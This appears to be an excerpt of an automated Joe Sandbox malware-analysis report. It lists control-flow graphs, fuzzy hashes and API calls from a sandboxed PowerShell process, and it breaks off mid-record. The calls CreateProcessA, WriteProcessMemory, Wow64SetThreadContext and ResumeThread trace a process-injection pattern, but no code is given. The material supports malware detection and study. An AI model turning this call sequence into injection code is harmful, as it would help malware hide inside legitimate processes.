                                                          control_flow_graph 359 2591e0-259279 361 2592c2-2592ea 359->361 362 25927b-259292 359->362 366 259330-259386 361->366 367 2592ec-259300 361->367 362->361 365 259294-259299 362->365 368 2592bc-2592bf 365->368 369 25929b-2592a5 365->369 375 2593cc-2594c3 CreateProcessA 366->375 376 259388-25939c 366->376 367->366 377 259302-259307 367->377 368->361 370 2592a7 369->370 371 2592a9-2592b8 369->371 370->371 371->371 374 2592ba 371->374 374->368 395 2594c5-2594cb 375->395 396 2594cc-2595b1 375->396 376->375 385 25939e-2593a3 376->385 378 259309-259313 377->378 379 25932a-25932d 377->379 380 259315 378->380 381 259317-259326 378->381 379->366 380->381 381->381 384 259328 381->384 384->379 387 2593a5-2593af 385->387 388 2593c6-2593c9 385->388 389 2593b1 387->389 390 2593b3-2593c2 387->390 388->375 389->390 390->390 392 2593c4 390->392 392->388 395->396 408 2595c1-2595c5 396->408 409 2595b3-2595b7 396->409 411 2595d5-2595d9 408->411 412 2595c7-2595cb 408->412 409->408 410 2595b9 409->410 410->408 414 2595e9-2595ed 411->414 415 2595db-2595df 411->415 412->411 413 2595cd 412->413 413->411 417 259623-25962e 414->417 418 2595ef-259618 414->418 415->414 416 2595e1 415->416 416->414 422 25962f 417->422 418->417 422->422
                                                          APIs
                                                          • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 002594A7
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.375523062.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_250000_powershell.jbxd
                                                          Similarity
                                                          • API ID: CreateProcess
                                                          • String ID: 8$$8$$8$
                                                          • API String ID: 963392458-2176841202
                                                          • Opcode ID: 226f364c7627ffd18cad9d3c95be497eb957d974cc979415b2bd1f55ab2a9435
                                                          • Instruction ID: bead675d06d9f4a8e7f10f1010f1c4c4dbe765f30b2d047e6b9247b7a335a7b4
                                                          • Opcode Fuzzy Hash: 226f364c7627ffd18cad9d3c95be497eb957d974cc979415b2bd1f55ab2a9435
                                                          • Instruction Fuzzy Hash: 73C11470D1021ADFDF25CFA8C841BEDBBB1BB49300F0095A9D859A7290DB749A99CF94

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 423 253358-259386 426 2593cc-2594c3 CreateProcessA 423->426 427 259388-25939c 423->427 440 2594c5-2594cb 426->440 441 2594cc-2595b1 426->441 427->426 430 25939e-2593a3 427->430 432 2593a5-2593af 430->432 433 2593c6-2593c9 430->433 434 2593b1 432->434 435 2593b3-2593c2 432->435 433->426 434->435 435->435 437 2593c4 435->437 437->433 440->441 453 2595c1-2595c5 441->453 454 2595b3-2595b7 441->454 456 2595d5-2595d9 453->456 457 2595c7-2595cb 453->457 454->453 455 2595b9 454->455 455->453 459 2595e9-2595ed 456->459 460 2595db-2595df 456->460 457->456 458 2595cd 457->458 458->456 462 259623-25962e 459->462 463 2595ef-259618 459->463 460->459 461 2595e1 460->461 461->459 467 25962f 462->467 463->462 467->467
                                                          APIs
                                                          • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 002594A7
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.375523062.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_250000_powershell.jbxd
                                                          Similarity
                                                          • API ID: CreateProcess
                                                          • String ID: 8$$8$$8$
                                                          • API String ID: 963392458-2176841202
                                                          • Opcode ID: 61bee7eed45d833a88c4c14b7b0b624cb856ce5c80601066f0ca433ac994daac
                                                          • Instruction ID: f28b6a9e8f22b87c52a2e39fdf767573f14a596d647a4782fc61411ee3ab5572
                                                          • Opcode Fuzzy Hash: 61bee7eed45d833a88c4c14b7b0b624cb856ce5c80601066f0ca433ac994daac
                                                          • Instruction Fuzzy Hash: 0B713370C0021ACBDF21CFA8C840BEDBBB1AF05305F0095AAD909BB250DB709AD9CF95

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 468 8743e8-87440b 469 8745e6-874612 468->469 470 874411-874416 468->470 484 874614-874619 469->484 485 87465f-874699 469->485 471 87442e-874432 470->471 472 874418-87441e 470->472 476 874593-87459d 471->476 477 874438-87443c 471->477 474 874422-87442c 472->474 475 874420 472->475 474->471 475->471 481 87459f-8745a8 476->481 482 8745ab-8745b1 476->482 478 87444f 477->478 479 87443e-87444d 477->479 483 874451-874453 478->483 479->483 486 8745b7-8745c3 482->486 487 8745b3-8745b5 482->487 483->476 489 874459-874479 483->489 490 874631-874649 484->490 491 87461b-874621 484->491 501 87469b-8746b6 485->501 502 8746b8 485->502 492 8745c5-8745e3 486->492 487->492 509 87447b-874496 489->509 510 874498 489->510 504 874657-87465c 490->504 505 87464b-87464d 490->505 494 874625-87462f 491->494 495 874623 491->495 494->490 495->490 508 8746ba-8746bc 501->508 502->508 505->504 512 8746c2-8746c6 508->512 513 87474a-874754 508->513 514 87449a-87449c 509->514 510->514 512->513 515 8746cc-8746e9 512->515 516 874756-87475d 513->516 517 874760-874766 513->517 514->476 522 8744a2-8744a4 514->522 528 8746ef-8746f1 515->528 529 874799-87479e 515->529 518 87476c-874778 517->518 519 874768-87476a 517->519 523 87477a-874796 518->523 519->523 524 8744a6-8744b2 522->524 525 8744b4 522->525 527 8744b6-8744b8 524->527 525->527 527->476 532 8744be-8744de 527->532 533 8746f3-8746f9 528->533 534 87470b-874720 528->534 529->528 546 8744f6-8744fa 532->546 547 8744e0-8744e6 532->547 536 8746fd-874709 533->536 537 8746fb 533->537 543 874726-874744 534->543 544 8747a3-8747d4 534->544 536->534 537->534 543->513 554 8747d6-8747e2 544->554 555 8747e4 544->555 552 874514-874518 546->552 553 8744fc-874502 546->553 550 8744ea-8744ec 547->550 551 8744e8 547->551 550->546 551->546 561 87451f-874521 552->561 557 874506-874512 553->557 558 874504 553->558 556 8747e6-8747e8 554->556 555->556 559 87480a-874814 556->559 560 8747ea-8747ee 556->560 557->552 558->552 563 874816-87481b 559->563 564 87481e-874824 559->564 560->559 562 8747f0-874807 560->562 566 874523-874529 561->566 567 874539-874590 561->567 569 874826-874828 564->569 570 87482a-874836 564->570 571 87452d-87452f 566->571 572 87452b 566->572 574 874838-874852 569->574 570->574 571->567 572->567
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.375622565.0000000000870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00870000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_870000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 4'p$4'p$$p$$p$$p
                                                          • API String ID: 0-2334450948
                                                          • Opcode ID: eebc22254b28d5714421a1b6399ce71607a1ea3455ca23c6251fdb34ca17b5d9
                                                          • Instruction ID: ee4addf196f3c90fbea6bfa8d2bb9822dd2980b16c1adb549089e0fbfef009a3
                                                          • Opcode Fuzzy Hash: eebc22254b28d5714421a1b6399ce71607a1ea3455ca23c6251fdb34ca17b5d9
                                                          • Instruction Fuzzy Hash: 91C124317043549FDB158A78841076ABBE2FFD6311F28D0AAD44DCB29ADB71CC46C762

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 642 8743ca-87440b 644 8745e6-874612 642->644 645 874411-874416 642->645 659 874614-874619 644->659 660 87465f-874699 644->660 646 87442e-874432 645->646 647 874418-87441e 645->647 651 874593-87459d 646->651 652 874438-87443c 646->652 649 874422-87442c 647->649 650 874420 647->650 649->646 650->646 656 87459f-8745a8 651->656 657 8745ab-8745b1 651->657 653 87444f 652->653 654 87443e-87444d 652->654 658 874451-874453 653->658 654->658 661 8745b7-8745c3 657->661 662 8745b3-8745b5 657->662 658->651 664 874459-874479 658->664 665 874631-874649 659->665 666 87461b-874621 659->666 676 87469b-8746b6 660->676 677 8746b8 660->677 667 8745c5-8745e3 661->667 662->667 684 87447b-874496 664->684 685 874498 664->685 679 874657-87465c 665->679 680 87464b-87464d 665->680 669 874625-87462f 666->669 670 874623 666->670 669->665 670->665 683 8746ba-8746bc 676->683 677->683 680->679 687 8746c2-8746c6 683->687 688 87474a-874754 683->688 689 87449a-87449c 684->689 685->689 687->688 690 8746cc-8746e9 687->690 691 874756-87475d 688->691 692 874760-874766 688->692 689->651 697 8744a2-8744a4 689->697 703 8746ef-8746f1 690->703 704 874799-87479e 690->704 693 87476c-874778 692->693 694 874768-87476a 692->694 698 87477a-874796 693->698 694->698 699 8744a6-8744b2 697->699 700 8744b4 697->700 702 8744b6-8744b8 699->702 700->702 702->651 707 8744be-8744de 702->707 708 8746f3-8746f9 703->708 709 87470b-874720 703->709 704->703 721 8744f6-8744fa 707->721 722 8744e0-8744e6 707->722 711 8746fd-874709 708->711 712 8746fb 708->712 718 874726-874744 709->718 719 8747a3-8747d4 709->719 711->709 712->709 718->688 729 8747d6-8747e2 719->729 730 8747e4 719->730 727 874514-874518 721->727 728 8744fc-874502 721->728 725 8744ea-8744ec 722->725 726 8744e8 722->726 725->721 726->721 736 87451f-874521 727->736 732 874506-874512 728->732 733 874504 728->733 731 8747e6-8747e8 729->731 730->731 734 87480a-874814 731->734 735 8747ea-8747ee 731->735 732->727 733->727 738 874816-87481b 734->738 739 87481e-874824 734->739 735->734 737 8747f0-874807 735->737 741 874523-874529 736->741 742 874539-874590 736->742 744 874826-874828 739->744 745 87482a-874836 739->745 746 87452d-87452f 741->746 747 87452b 741->747 749 874838-874852 744->749 745->749 746->742 747->742
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.375622565.0000000000870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00870000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_870000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 4'p$$p$$p
                                                          • API String ID: 0-2931952147
                                                          • Opcode ID: c67eac78b35258f12572b85f6d0f9cbe9658e16740419f123edf8e989d23a56e
                                                          • Instruction ID: 4b359c79febc2d8042346a41e873466141c71c8277b92e4187f307c05e974841
                                                          • Opcode Fuzzy Hash: c67eac78b35258f12572b85f6d0f9cbe9658e16740419f123edf8e989d23a56e
                                                          • Instruction Fuzzy Hash: F9313570A053499FDF218A28D41076A7BA1FF91305F29E066D44DDB1AAD734CC41DB66

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 753 874deb-874ded 754 874def-874dfc 753->754 755 874e2a 753->755 758 874e02-874e0f 754->758 759 874e8a-874e8e 754->759 756 874e14-874e18 755->756 757 874e2b-874e2f 755->757 760 874e30-874e87 756->760 761 874e1a 756->761 757->760 764 874e1c-874e1e 757->764 758->756 762 874e90-874e94 759->762 761->764 766 874e96-874e9f 762->766 767 874ea2-874ea8 762->767 764->762 769 874e20 764->769 770 874eae-874eba 767->770 771 874eaa-874eac 767->771 773 874e24-874e26 769->773 774 874e22 769->774 772 874ebc-874edc 770->772 771->772 773->755 774->760
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.375622565.0000000000870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00870000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_870000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 4'p$4'p
                                                          • API String ID: 0-3973980265
                                                          • Opcode ID: d864ab27949aa14d2699f3cf0d72f8d2edd231d137fe0532edc6c9c41427108b
                                                          • Instruction ID: d10ff414823ba788aae475d37848c7f718e2c1266265f4dc97414453c348f0c7
                                                          • Opcode Fuzzy Hash: d864ab27949aa14d2699f3cf0d72f8d2edd231d137fe0532edc6c9c41427108b
                                                          • Instruction Fuzzy Hash: E92135377102059BCB556678A85077EBB96FBC9331F64D46AD54ACB389CF31CC1283A2

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1086 258e48-258eb3 1088 258eb5-258ec7 1086->1088 1089 258eca-258f31 WriteProcessMemory 1086->1089 1088->1089 1091 258f33-258f39 1089->1091 1092 258f3a-258f8c 1089->1092 1091->1092
                                                          APIs
                                                          • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00258F1B
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.375523062.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_250000_powershell.jbxd
                                                          Similarity
                                                          • API ID: MemoryProcessWrite
                                                          • String ID:
                                                          • API String ID: 3559483778-0
                                                          • Opcode ID: 746435890a5cbaac3932766d157017bbb7c8cf0263a0ee786381e216efac7a9b
                                                          • Instruction ID: 711ba7d8959d86d2cb2763b35fe1905ac2080004205a6b497be1b1f9f4fd9bc3
                                                          • Opcode Fuzzy Hash: 746435890a5cbaac3932766d157017bbb7c8cf0263a0ee786381e216efac7a9b
                                                          • Instruction Fuzzy Hash: F741A9B4D002599FCF00CFA9D984AEEFBF1BB49314F20942AE814B7250D774AA55CF68

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1097 258af8-258b60 1100 258b77-258bc5 Wow64SetThreadContext 1097->1100 1101 258b62-258b74 1097->1101 1103 258bc7-258bcd 1100->1103 1104 258bce-258c1a 1100->1104 1101->1100 1103->1104
                                                          APIs
                                                          • Wow64SetThreadContext.KERNEL32(?,?), ref: 00258BAF
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.375523062.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_250000_powershell.jbxd
                                                          Similarity
                                                          • API ID: ContextThreadWow64
                                                          • String ID:
                                                          • API String ID: 983334009-0
                                                          • Opcode ID: 6de5796efce0d023a1dcbb3ded30da66411aee0e6ccc233aed159a91bf5aa345
                                                          • Instruction ID: 68b314f40e050991dc7e048cf0fa9750abad2255b637860d4d83153e8d6403fd
                                                          • Opcode Fuzzy Hash: 6de5796efce0d023a1dcbb3ded30da66411aee0e6ccc233aed159a91bf5aa345
                                                          • Instruction Fuzzy Hash: 7341BCB5D102599FCB10CFA9D984AEEBBF1BF49314F24802AE814B7240D778A949CF54

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1109 258b00-258b60 1111 258b77-258bc5 Wow64SetThreadContext 1109->1111 1112 258b62-258b74 1109->1112 1114 258bc7-258bcd 1111->1114 1115 258bce-258c1a 1111->1115 1112->1111 1114->1115
                                                          APIs
                                                          • Wow64SetThreadContext.KERNEL32(?,?), ref: 00258BAF
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.375523062.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_250000_powershell.jbxd
                                                          Similarity
                                                          • API ID: ContextThreadWow64
                                                          • String ID:
                                                          • API String ID: 983334009-0
                                                          • Opcode ID: 3cde0f1892b968e6987ddd94960dedf647980ac39b5eeb92449d9b93b139bf09
                                                          • Instruction ID: c2268f6b21df64ef0a45c86816fa46874d4332e626c92cfd3b8f4e9486772339
                                                          • Opcode Fuzzy Hash: 3cde0f1892b968e6987ddd94960dedf647980ac39b5eeb92449d9b93b139bf09
                                                          • Instruction Fuzzy Hash: A741ACB4D102599FCB10CFA9D984AEEFBF5AF49314F24802AE814B7244D778A949CF54

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1120 258a08-258aa4 ResumeThread 1123 258aa6-258aac 1120->1123 1124 258aad-258aef 1120->1124 1123->1124
                                                          APIs
                                                          • ResumeThread.KERNELBASE(?), ref: 00258A8E
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.375523062.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_250000_powershell.jbxd
                                                          Similarity
                                                          • API ID: ResumeThread
                                                          • String ID:
                                                          • API String ID: 947044025-0
                                                          • Opcode ID: 54216e25354a6eed7ad5f61dd4dd274a9cf3795372d1abb3e0be76fa6305a6dd
                                                          • Instruction ID: d5af1c836611fe6353a79eb1f6cda9e5d929e32443f56a1f9e680357b7751520
                                                          • Opcode Fuzzy Hash: 54216e25354a6eed7ad5f61dd4dd274a9cf3795372d1abb3e0be76fa6305a6dd
                                                          • Instruction Fuzzy Hash: 7231D9B5D112599FCF10CFA9D984AEEFBB1AF49314F24842AE815B7340C774A906CF98
                                                          APIs
                                                          • ResumeThread.KERNELBASE(?), ref: 00258A8E
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.375523062.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_250000_powershell.jbxd
                                                          Similarity
                                                          • API ID: ResumeThread
                                                          • String ID:
                                                          • API String ID: 947044025-0
                                                          • Opcode ID: e5e8b3382a1cc7558aaf9e7336a875f1146eed57d936cc8b0101b49b2deca187
                                                          • Instruction ID: 9ce27ed1a25a778d7aa0a401c19b1ccaa450da6481812fdcd3e006fd8b248d1c
                                                          • Opcode Fuzzy Hash: e5e8b3382a1cc7558aaf9e7336a875f1146eed57d936cc8b0101b49b2deca187
                                                          • Instruction Fuzzy Hash: DB31BAB4D102199FCF10CFA9D984AAEFBB5AF49314F14942AE815B7300D775A906CF98
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.375622565.0000000000870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00870000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_870000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: $p
                                                          • API String ID: 0-982128392
                                                          • Opcode ID: 40a1740d9cf55930336eee7dc34f879ca7523a0c1ae7120c6145ab4beb0eaea5
                                                          • Instruction ID: 868652d87a63fa2b2cdf4d177ae9e3fe77b385d2b2fc6cfd32e70a3e809765bb
                                                          • Opcode Fuzzy Hash: 40a1740d9cf55930336eee7dc34f879ca7523a0c1ae7120c6145ab4beb0eaea5
                                                          • Instruction Fuzzy Hash: 5F1160753002149FDF14CE49C899E66F7AAFB94354B1DC1A9E80CCB659CB32DD41CB90
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.375622565.0000000000870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00870000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_870000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 5d1c22bfacacb20a775233132da2b5bbf76b9003b43f86dc013065548e4c5ba1
                                                          • Instruction ID: 4510601860e914b6f559e5d6cef89be844f8b301ca56ecabc4c1485ba9630dd9
                                                          • Opcode Fuzzy Hash: 5d1c22bfacacb20a775233132da2b5bbf76b9003b43f86dc013065548e4c5ba1
                                                          • Instruction Fuzzy Hash: 3011E1707083C46FC7165778882AB6E7FA1AF86304F1580AEE455DF2D3CAA59C46C367
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.375476435.00000000000ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 000ED000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_ed000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a14741942e643070f8acb248671465d316c207f8d48e1bd24e3d78008ed95ca6
                                                          • Instruction ID: 5cf9c2188e60fea1f6a898b7ace728074371210c0811c0d9f8d62f993f201f28
                                                          • Opcode Fuzzy Hash: a14741942e643070f8acb248671465d316c207f8d48e1bd24e3d78008ed95ca6
                                                          • Instruction Fuzzy Hash: D4014C6140E3C09FD7128B258C94B62BFB4DF53224F1D81DBD8889F2A7C2699C48C772
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.375476435.00000000000ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 000ED000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_ed000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b9c3d23fb9f9e5c33eff74947e0a98c76f8aec8c7a69eca3d6a97d14a375658d
                                                          • Instruction ID: 4f315e6e0291feb94a016ad3928a8fdfceef4c8b7da45a92cb0c1273f4f385ed
                                                          • Opcode Fuzzy Hash: b9c3d23fb9f9e5c33eff74947e0a98c76f8aec8c7a69eca3d6a97d14a375658d
                                                          • Instruction Fuzzy Hash: 5701F771408380AEE7608E16C8C4B6ABFD8DF41364F1C841BEC445B286C279D845CAB1
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.375622565.0000000000870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00870000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_870000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: d72e595e726f242cf2e3b1a693e8e0c6e194641594265af9e9a2d8ff5da34093
                                                          • Instruction ID: 622c83e0315606cea897b02e05171a4551525694feeef9c3196edc9f0ec01e36
                                                          • Opcode Fuzzy Hash: d72e595e726f242cf2e3b1a693e8e0c6e194641594265af9e9a2d8ff5da34093
                                                          • Instruction Fuzzy Hash: 6DF0F47070024827C72056698819B7F6996EBC4700F50802CF819DF3C6C8B1AC418356
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.375622565.0000000000870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00870000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_870000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 4'p$4'p$4$L4p$L4p$L4p$L4p$L4p$L4p$`8|$`8|$`8|$$p$$p
                                                          • API String ID: 0-1398247937
                                                          • Opcode ID: 4ac120f0607846629cdc1c2f79c93ccf2a748a90e157742a27261ff020db14eb
                                                          • Instruction ID: 8f5642a8a0211a78321b1da3c790134e8ff8db0d0cd113f08d8e21431aba2c19
                                                          • Opcode Fuzzy Hash: 4ac120f0607846629cdc1c2f79c93ccf2a748a90e157742a27261ff020db14eb
                                                          • Instruction Fuzzy Hash: ADD1F731700248DFCB159A68D814BAE7BA2FBC4314F58C06AE959DB296CB71DD41CBA2
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.375622565.0000000000870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00870000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_870000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 4'p$4'p$W$$p$$p$$p$$p$$p$$p
                                                          • API String ID: 0-3480890733
                                                          • Opcode ID: 6271f8cdcfbae32a0053e21a56a9a32f056efedd921a07e998865492d279723d
                                                          • Instruction ID: 3725604a512b55ab1a2bc677ea42d262ec1462061eafe88ce1eeb52a2ddb71e3
                                                          • Opcode Fuzzy Hash: 6271f8cdcfbae32a0053e21a56a9a32f056efedd921a07e998865492d279723d
                                                          • Instruction Fuzzy Hash: 546156357002558FC715AA68D40067ABBA2FFD5311F28C07BD659CB25ADF31CC86C3A1
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.375622565.0000000000870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00870000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_870000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: $p$$p$$p$$p$$p$$p$[g$[g
                                                          • API String ID: 0-2082769154
                                                          • Opcode ID: c8dbe9336a3819d32eaeb883a82d24d43579c29feb7382eac78ff24f4a2057a4
                                                          • Instruction ID: a6652f53525181a3f8d5aec65182ec0a0fb81e6be89c8fd84060f77dcf292c2d
                                                          • Opcode Fuzzy Hash: c8dbe9336a3819d32eaeb883a82d24d43579c29feb7382eac78ff24f4a2057a4
                                                          • Instruction Fuzzy Hash: 76511336B042419FCB258AAD980967AFBE6FFD5320F28C06BC449CB65ADA31CC41C761
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.375622565.0000000000870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00870000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_870000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: L4p$L4p$L4p$\9|$\9|$\9|
                                                          • API String ID: 0-504112339
                                                          • Opcode ID: 74f17533d878326fa59d4f50a629c37c865caf52eba1dc4244ad7cf29aa323b6
                                                          • Instruction ID: e707f1685fd659d3b960dac417ece44eb49a8dfb58f3f6c7f763a453647a2da3
                                                          • Opcode Fuzzy Hash: 74f17533d878326fa59d4f50a629c37c865caf52eba1dc4244ad7cf29aa323b6
                                                          • Instruction Fuzzy Hash: BC61F635700248EFCB199A68C810B6E7BA2FFC4300F14C469E919CB295DB71ED55CFA1
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.375622565.0000000000870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00870000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_870000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: T;|$tPp$tPp$[g$[g
                                                          • API String ID: 0-3338444184
                                                          • Opcode ID: 21feba11e5dfdc0b1632fbb1158ba2635ae3cf9ae2920e5a15ce3eaef297defb
                                                          • Instruction ID: fa8375bbe87f4bd08c016341ad5edbbdf4131401912bfe7533b974bb008e4c92
                                                          • Opcode Fuzzy Hash: 21feba11e5dfdc0b1632fbb1158ba2635ae3cf9ae2920e5a15ce3eaef297defb
                                                          • Instruction Fuzzy Hash: 13511931704314DFD7248A69C844B6ABBA2FFC5315F28C47AE54DCB29ACA71DC41CBA1
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.375622565.0000000000870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00870000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_870000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: h%g$h%g$$p$$p$$p
                                                          • API String ID: 0-3278147714
                                                          • Opcode ID: 73863bc5835e06059a30bc345dd0433e44af727fe5f6c92dda64f3295c3c2409
                                                          • Instruction ID: c93111a672491c31df937b46569cac7a23563642bf784f9a938521f46497bf93
                                                          • Opcode Fuzzy Hash: 73863bc5835e06059a30bc345dd0433e44af727fe5f6c92dda64f3295c3c2409
                                                          • Instruction Fuzzy Hash: 4E511F31B002019FCB249A6D884476AFBE6FFC5310F28C46AE849DB259DF71DC81C7A1
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.375622565.0000000000870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00870000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_870000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 89|$h%g$h%g$tPp$tPp
                                                          • API String ID: 0-590500428
                                                          • Opcode ID: 745a72092435d32a67fd59868c7836872e1f48b0c95956425b288210c422bfe4
                                                          • Instruction ID: 63bac0f34e52b3de5745bddfa4eeb2180edc73194ca72a7d068dd96affd9812f
                                                          • Opcode Fuzzy Hash: 745a72092435d32a67fd59868c7836872e1f48b0c95956425b288210c422bfe4
                                                          • Instruction Fuzzy Hash: 5A510731B042959FCB248A6D9854A7AFFA1FFC5314F68C07AD949CB295CE72CC81C761
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.375622565.0000000000870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00870000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_870000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 4'p$4'p$$p$$p$$p
                                                          • API String ID: 0-2334450948
                                                          • Opcode ID: 2e50bc61ea55dc8e39274ffbb05a61c925ba002e38b11027da1c1187074e4e3c
                                                          • Instruction ID: a5b9b3848817224d4967aae14bab10e3b6adcea6683b0ea460156537e0e32770
                                                          • Opcode Fuzzy Hash: 2e50bc61ea55dc8e39274ffbb05a61c925ba002e38b11027da1c1187074e4e3c
                                                          • Instruction Fuzzy Hash: 26415736304215DFCB298A6894007AAFBA2FBC1321B78D07BD959CB26ADB71CC02C755
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.375622565.0000000000870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00870000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_870000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 4'p$4'p$X:|$X:|
                                                          • API String ID: 0-1695239314
                                                          • Opcode ID: 45104eba8082290ca96fb4c0bb00ab4307bdd84c4d3f859b64e332720b51dee5
